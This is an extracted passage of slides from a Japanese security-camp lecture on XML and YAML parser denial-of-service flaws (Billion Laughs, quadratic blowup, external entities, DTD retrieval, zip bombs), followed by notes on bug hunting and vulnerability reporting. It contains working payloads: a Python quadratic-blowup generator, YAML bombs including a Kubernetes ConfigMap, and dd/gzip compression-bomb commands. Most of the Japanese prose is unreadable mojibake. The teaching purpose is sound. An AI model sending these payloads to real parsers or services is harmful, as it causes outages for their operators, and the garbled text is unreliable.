  113. #JMMJPO-BVHIT ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  114. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ #JMMJPO-BVHITΛࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 

    $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/billion-laughs $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  115. Өڹ͸ϥΠϒϥϦͦΕͧΕ w 9.-Λύʔε͢Δ࣮૷͕ͦΕͧΕҟͳΔͨΊӨڹ౓߹͍΋ҟͳΔ w FUSFFʹ͸࠷ߴʹࢗ͞Δʂ  #JMMJPO-BVHITΛࢼ͢

  116. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  117. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w #JMMJPO-BVHITʹࣅ͍ͯΔ w ೖΕࢠʹͳͬͨ&OUJUZΛ࢖༻͢ΔͷͰ͸ͳ͘ɺ਺ઍจࣈͷจࣈྻΛද͢େ͖ͳ &OUJUZΛ܁Γฦ͠ෳ੡ͯ͠ϝϞϦফඅΛૂ͏ w ,#ఔ౓ͷ9.-ϑΝΠϧͰɺ.#͔Β਺(#ͷϝϞϦΛফඅͤ͞ΒΕΔ  9.-ʹΑΔ%P4߈ܸ

  118. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ  <?xml

    version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)"> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ)</DoS> 9.-ϑΝΠϧྫ

  119. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢  size = 55000 entity

    = 'A' * size refs = '&x;' * size data = '''\ <?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)

  120. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO

  121. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ 2VBESBUJDCMPXVQΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/quadratic-blowup/ $ cd etree $ docker build . -t quadratic-blowup-etree $ docker run quadratic-blowup-etree

  122. ଞͷύʔαͰ΋͍͚ΔͷͰ͸🤔ʁ w #JMMJPO-BVHIT2VBESBUJDCMPXVQFOUJUZFYQBOTJPO͸9.-ϑΝΠϧ͕ ࣋ͭࢀরػೳΛѱ༻͢Δ੬ऑੑ w ଞʹಉ༷ͷػೳ͕͋ΔϑΝΠϧ͕͋Ε͹ಉ͡ςΫ͕࢖͑ͦ͏🤔ʂʁ 

  123. #JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2

    [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

  124. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w ,VCFSOFUFT"1*αʔόʢLTJPLVCFSOFUFTQLHBQJTFSWFS  ʣʹ ࡉ޻ͨ͠:".-ϑΝΠϧΛૹ৴͢Δͱ#JMMJPO-BVHIT͕ى͜Δ੬ऑੑ w $7&

    w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFT

  125. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a

    ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default

  126. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ

    ͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ

  127. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w 2VBESBUJDCMPXVQΛࢼߦ͢Δ:".-ϑΝΠϧ w Πϯλʔωοτ্ʹ1P$͕ͳ͍ʢଟ෼ʣͷͰࣗ෼Ͱॻ͖·ͨ͠ʂ lol1: &lol1 “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)AAAAAAAAAAAAAAAA”

    lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,(লུ),*lol1]

  128. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ :".-ύʔαͰࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1Z:".-ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 

    $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/yml-parser $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  129. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  130. &YUFSOBMFOUJUZFYQBOTJPO 99&ͷҰछ w Α͘஌ΒΕ͍ͯΔλΠϓͷ99& w ઌ΄Ͳղઆͨ͠΋ͷͱಉ༷ͳͷͰ͜͜Ͱ͸ղઆΛׂѪ 

  131. %5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ  99&ͷҰछ <?xml version="1.0"

    encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head/> <body>text</body> </html>

  132. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM &YUFSOBMFOUJUZFYQBOTJPO%5%3FUSJFWBM

  133. &YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom

  134. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  135. %FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ 

    $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍

  136. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM %FDPNQSFTTJPO#PNC

  137. %FDPNQSFTTJPO#PNCʜ  ԋशͳ͠ʜ w ҆શʹԋशΛ΍ͬͯ΋Β͏ͷ͕೉͍͠ͷͰ࢒೦ͳ͕Βԋश͸ͳ͍Ͱ͢ʜ

  138. ͜͜·Ͱͷ·ͱΊ w 9.-ʹ͸ଟछଟ༷ͳ߈ܸςΫ͕͋ΔͷͰɺઃఆϑΝΠϧʹ͸+40/ͳͲΛ ࢖͏ํ͕͍͍ w ٯʹ੬ऑੑΛ୳ཱ͢৔͔ΒݟΔͱ9.-ϑΝΠϧΛύʔε͢Δ෦෼͸ૂ͍໨ w 9.-ϥΠϒϥϦຖʹ༗ޮͳ੬ऑੑ͕ҧ͏ͷ͸1ZUIPOʹݶͬͨ͜ͱͰ͸ͳ͍ w ڵຯ͕͋Ε͹ଞͷݴޠͷ΋ͷ΋ௐ΂ͯΈ͍ͯͩ͘͞

    

  139. ୈ̐ষ (JU)VCΛ࢖ͬͨόάϋϯτํ๏

  140. ϥΠϒϥϦຖͷ੬ऑੑΛ஌ͬͨޙ͸ʜ (JU)VCΛ࢖ͬͨόάϋϯτํ๏ w ಛఆͷϥΠϒϥϦΛ࢖༻͍ͯ͠ΔίʔυΛ͍͔ʹ୳͔͢ w (JU)VCͷػೳΛ׆༻͢Δͱݟ͚ͭΒΕΔ w 5PQJDػೳ w ίʔυݕࡧػೳ

    w ίϛοτݕࡧػೳ w JTTVFݕࡧػೳ 

  141. Ұ෦ࣗओن੍😢 

  142. ԋश੬ऑੑ͕͋Δ044Λ୳͢ʢ͕࣌ؒ͋Ε͹ʣ w ࢒Γ͕࣌ؒ͋Ε͹΍ͬͯ΋Β͏ w ͳ͔ͬͨΒऴΘΔ 

  143.  IUUQTPXBTQPSHXXXQEGBSDIJWF08"41/;9.-%BOHFSPVTQEG

  144. ࠶ܝ੬ऑੑΛൃݟͨ͠ޙ͸ใࠂʂ  IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  145. ஫ҙࣄ߲  w ଟ෼ɺ͋Δఔ౓ελʔ͕͍͍ͭͯΔ(JU)VCϦϙδτϦͰͳ͍ͱରԠͯ͠΋Β ͑ͳ͍

  146. ୈ̑ষ ٕज़ͱ޲͖߹͏࢟੎ͷ࿩

  147. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w 9.-ύʔαʹؔ͢Δ੬ऑੑʹৄ͘͠ͳͬͨͷ͸"OESPJE.BOJGFTUYNMΛ ύʔε͢ΔίʔυΛॻ͍ͨͷ͕͖͔͚ͬ w ੩తղੳπʔϧʹࣗ෼͕ॻ͍ͨίʔυΛೖྗͨ͠Β੬ऑੑ͕͋ͬͨ w 1ZUIPOͷ9.-ϥΠϒϥϦ͸σϑΥϧτͰ੬ऑͰͦΕͧΕ༗ޮͳ੬ऑੑ͕ҟͳ Δ͜ͱΛ஌ͬͨ 

  148. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ίʔυΛॻ࣌͘ʹࣗ෼͕ॻ͍ͨίʔυʹ੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱͰ ੬ऑੑΛͳ͘͠ɺηΩϡϦςΟͷ஌ࣝ΋਎ʹͭ͘ w ։ൃͷܦݧΛੵΈͳ͕ΒɺηΩϡϦςΟͷ஌ݟ΋ߴΊΒΕΔ w ͦͯ͠ಘͨ஌ࣝͰόάϋϯτ͢Δͱ$7&ΛऔಘͰ͖ͨΓɺใ঑ۚΛ໯ͬͨΓ Ͱ͖Δ͔΋ʜʂʂʂ 

  149. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ηΩϡϦςΟɾΩϟϯϓʹࢀՃ͔ͨ͠Βͱ͍ͬͯશһ͕ηΩϡϦςΟͷಓʹ ਐΉ༁Ͱ͸ͳͯ͘։ൃଆͷಓΛาΜͰ͍͘ਓ΋͍Δ w ηΩϡϦςΟͷ஌ࣝ͸ηΩϡϦςΟΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋ ։ൃଆͷΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋໾ཱͭ w ࠓޙηΩϡϦςΟɾΩϟϯϓͰֶΜͩ஌ࣝͷ͏ͪԿ͔͕໾ཱͯͯ͘ΕΔͱ ͏Ε͍͠Ͱ͢

    

  150.